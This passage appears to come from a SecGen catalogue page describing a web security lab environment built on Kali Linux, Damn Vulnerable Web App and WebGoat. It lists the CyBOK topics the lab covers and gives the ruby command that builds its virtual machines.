ruby secgen.rb -s scenarios/labs/web_security/7_additional_web.xml run
```

View source

web_security/websec_lab.xml

Details

Key Data
Name Web security lab environment
Description An environment for web security labs. Kali Linux with Damn Vulnerable Web App server, WebGoat, and web sec tools.
Type lab-environment; ctf-lab
Author Z. Cliffe Schreuders
VM names kali

CyBOK KAs, Topics, and Keywords

| KA | Topic | Keywords |
|---|---|---|
| Web & Mobile Security (WAM) | Fundamental Concepts and Approaches | web PKI and HTTPS; authentication; ACCESS CONTROL; cookies; passwords and alternatives; JAVASCRIPT; HYPERTEXT MARKUP LANGUAGE (HTML); CASCADING STYLE SHEETS (CSS); HYPERTEXT TRANSFER PROTOCOL (HTTP); HYPERTEXT TRANSFER PROTOCOL (HTTP) - PROXYING; DATABASE; Broken Access Control / Insecure Direct Object References; SESSION HIJACKING; CERTIFICATES; REPRESENTATIONAL STATE TRANSFER (REST); PERMISSION DIALOG BASED ACCESS CONTROL; CLIENT-SERVER MODELS |
| Web & Mobile Security (WAM) | Client-Side Vulnerabilities and Mitigations | client-side storage; CLIENT-SIDE VALIDATION; clickjacking |
| Web & Mobile Security (WAM) | Server-Side Vulnerabilities and Mitigations | injection vulnerabilities; server-side misconfiguration and vulnerable components; CROSS-SITE SCRIPTING (XSS); SAME ORIGIN POLICY (SOP); COMMAND INJECTION; SQL-INJECTION; CROSS-SITE REQUEST FORGERY (CSRF); CONFUSED DEPUTY ATTACKS; BACK-END; BLIND ATTACKS |
| Software Security (SS) | Categories of Vulnerabilities | Web vulnerabilities / OWASP Top 10; API vulnerabilities |
| Software Security (SS) | Prevention of Vulnerabilities | coding practices; Protecting against session management attacks; XSS; SQLi; CSRF; API design |
| Software Security (SS) | Detection of Vulnerabilities | dynamic detection |
| Security Operations & Incident Management (SOIM) | Monitor: Data Sources | network traffic |
| Forensics (F) | Main Memory Forensics | network connections; data recovery and file content carving |
| Network Security (NS) | Network Defence Tools | FIREWALLS; IPTables; VIRTUAL - PRIVATE NETWORK (VPN) |
| Network Security (NS) | Internet Architecture | network layer security |
| Web & Mobile Security (WAM) | FIREWALLS | FIREWALLS |

Command to build VMs and start scenario:

```shell
ruby secgen.rb -s scenarios/labs/web_security/websec_lab.xml run
```

View source